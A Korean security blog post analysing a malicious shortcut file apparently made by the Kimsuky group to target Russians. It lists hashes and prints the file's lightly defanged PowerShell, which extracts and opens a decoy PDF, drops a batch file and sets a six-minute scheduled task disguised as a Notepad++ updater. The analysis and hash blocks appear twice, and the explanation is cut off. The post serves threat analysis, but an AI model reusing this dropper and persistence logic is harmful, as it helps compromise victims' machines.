한국 관광을 핑계로 러시아 인들을 타겟을 하고 추정 되는 김수키(Kimsuky)만든 악성코드-241007.lnk(2024.10.14)
Contents
오늘은 오늘도 대한민국 안보를 열심히 위협하는 해킹 단체인 김수키(Kimsuky)에서 러시아인들에게 한국 전통시장,경북 군,청성등을 소개하는 것 같은데 아무튼 해당 악성코드는 러시아인을 대상으로 타겟으로 추정이 되는 악성코드 입니다.
일단 해당 악성코드 해쉬값은 다음과 같습니다.
파일명: 241007.lnk
사이즈:46.8 MB
MD5:7eb7d0133965022ad362132782da9d15
SHA-1:564b9c9dac942c1284ab565607997b796e28b80c
SHA-256:2a9524821533e3285e9271706c67302e6a0fa8eca79090ba980ad9d8d299c8ea
그리고 악성코드에 포함된 PowerShell 코드는 다음과 같습니다.
StringData
{
namestring:
relativepath: not present
workingdir: not present
commandlinearguments: /k for /f "toke(n)s=*" %a i(n) ('dir C:\Windows\SysWow64\
WindowsPow(e)rShell\v1.0\*rshell(.)exe /s /b /od') do call %a "$xtTGE = Get-Loc
atio(n);if($xtTGE -Match 'Sy(s)tem32' -or $xtT(G)E -Match 'Program Files') {$xt
TGE = '%t(e)mp%'};$pz5FU74(r)Lj=@('(.)lnk');$hkJ(9)aVpxO2V7gi = Get-ChildItem -
Pa(t)h $xtTGE -Recu(r)se *.* -File | where {$_.ext(e)nsion -in $pz5FU7(4)rLj}
| where-(o)bject {$_.length -eq 0x(0)2EE6666} | Select(-)Object -Exp(a)ndPrope
rty FullName;$hCJgBhK9jtWsC = New-Object System.(I)O.FileStream($hkJ9aVpxO2V7g
i, [System.IO.FileMode]::Open, [System.IO(.)FileAccess]::Read);$h(C)JgBhK9jtW
sC.Seek(0x00001742, [System.IO(.)SeekOrig(i)n]::Begin);$Q(f)ljwCakcmCVy1 = New-O
bject byte[] 0x0003A77A(;)$hCJ(g)BhK9jtWsC.Read($Qflj(w)CakcmCVy1, 0, 0x(0)003A7
7A);$Kok(f)X0wnDm = $hkJ9aVpxO2(V)7gi.replace('.lnk','(.)pdf');sc $Kokf(X)0wnDm
$QfljwCa(k)cmCVy1 -Encoding Byte;& $KokfX0wnDm(;)$hCJgBhK9jtW(s)C.Seek(0x0003B(E
)BC, [System.IO.S(e)ekOrigin]::Begin);$(u)f6YU1v4N=N(e)w-Object byte[] 0x0000(0)
E9B;$hCJgBhK9jtWsC.Read($uf6YU1v4N, 0, 0x0000(0)E9B);$hCJgBhK9jtWsC.Close();$F61
heDpmAIoK=$env(:)public+'\Libraries\winboot(.)b'+'a' +'t';$g(N)49UVvZbCvzq='cmd
/q /c \\\"start \\\"Not(e)PadPlus\\\" /min \\\"' + $F61heD(p)mAIoK + '\\\" '+[ch
ar][in(t)]::Parse(38, 'Number')+[(c)har][int]::Parse(38, 'Number')+' exit\\\"';s
chta(s)ks /create /sc minute /mo 6 /tn 'Notepad(P)lusAutoUpdate' /tr $gN49UV(v)Z
bCvzq /f;sc $F61h(e)DpmAIoK $u(f)6YU1v4N -E(n)coding Byte;&$F61heDpmAIoK;"&& exit
iconlocation: (.)pdf
}
코드 설명
1.첫 번째 명령어: Reverse Shell 찾기
해당 명령어는 …
일단 해당 악성코드 해쉬값은 다음과 같습니다.
파일명: 241007.lnk
사이즈:46.8 MB
MD5:7eb7d0133965022ad362132782da9d15
SHA-1:564b9c9dac942c1284ab565607997b796e28b80c
SHA-256:2a9524821533e3285e9271706c67302e6a0fa8eca79090ba980ad9d8d299c8ea
그리고 악성코드에 포함된 PowerShell 코드는 다음과 같습니다.
StringData
{
namestring:
relativepath: not present
workingdir: not present
commandlinearguments: /k for /f "toke(n)s=*" %a i(n) ('dir C:\Windows\SysWow64\
WindowsPow(e)rShell\v1.0\*rshell(.)exe /s /b /od') do call %a "$xtTGE = Get-Loc
atio(n);if($xtTGE -Match 'Sy(s)tem32' -or $xtT(G)E -Match 'Program Files') {$xt
TGE = '%t(e)mp%'};$pz5FU74(r)Lj=@('(.)lnk');$hkJ(9)aVpxO2V7gi = Get-ChildItem -
Pa(t)h $xtTGE -Recu(r)se *.* -File | where {$_.ext(e)nsion -in $pz5FU7(4)rLj}
| where-(o)bject {$_.length -eq 0x(0)2EE6666} | Select(-)Object -Exp(a)ndPrope
rty FullName;$hCJgBhK9jtWsC = New-Object System.(I)O.FileStream($hkJ9aVpxO2V7g
i, [System.IO.FileMode]::Open, [System.IO(.)FileAccess]::Read);$h(C)JgBhK9jtW
sC.Seek(0x00001742, [System.IO(.)SeekOrig(i)n]::Begin);$Q(f)ljwCakcmCVy1 = New-O
bject byte[] 0x0003A77A(;)$hCJ(g)BhK9jtWsC.Read($Qflj(w)CakcmCVy1, 0, 0x(0)003A7
7A);$Kok(f)X0wnDm = $hkJ9aVpxO2(V)7gi.replace('.lnk','(.)pdf');sc $Kokf(X)0wnDm
$QfljwCa(k)cmCVy1 -Encoding Byte;& $KokfX0wnDm(;)$hCJgBhK9jtW(s)C.Seek(0x0003B(E
)BC, [System.IO.S(e)ekOrigin]::Begin);$(u)f6YU1v4N=N(e)w-Object byte[] 0x0000(0)
E9B;$hCJgBhK9jtWsC.Read($uf6YU1v4N, 0, 0x0000(0)E9B);$hCJgBhK9jtWsC.Close();$F61
heDpmAIoK=$env(:)public+'\Libraries\winboot(.)b'+'a' +'t';$g(N)49UVvZbCvzq='cmd
/q /c \\\"start \\\"Not(e)PadPlus\\\" /min \\\"' + $F61heD(p)mAIoK + '\\\" '+[ch
ar][in(t)]::Parse(38, 'Number')+[(c)har][int]::Parse(38, 'Number')+' exit\\\"';s
chta(s)ks /create /sc minute /mo 6 /tn 'Notepad(P)lusAutoUpdate' /tr $gN49UV(v)Z
bCvzq /f;sc $F61h(e)DpmAIoK $u(f)6YU1v4N -E(n)coding Byte;&$F61heDpmAIoK;"&& exit
iconlocation: (.)pdf
}
코드 설명
1.첫 번째 명령어: Reverse Shell 찾기
해당 명령어는 …
IoC
2a9524821533e3285e9271706c67302e6a0fa8eca79090ba980ad9d8d299c8ea
7eb7d0133965022ad362132782da9d15
564b9c9dac942c1284ab565607997b796e28b80c
7eb7d0133965022ad362132782da9d15
564b9c9dac942c1284ab565607997b796e28b80c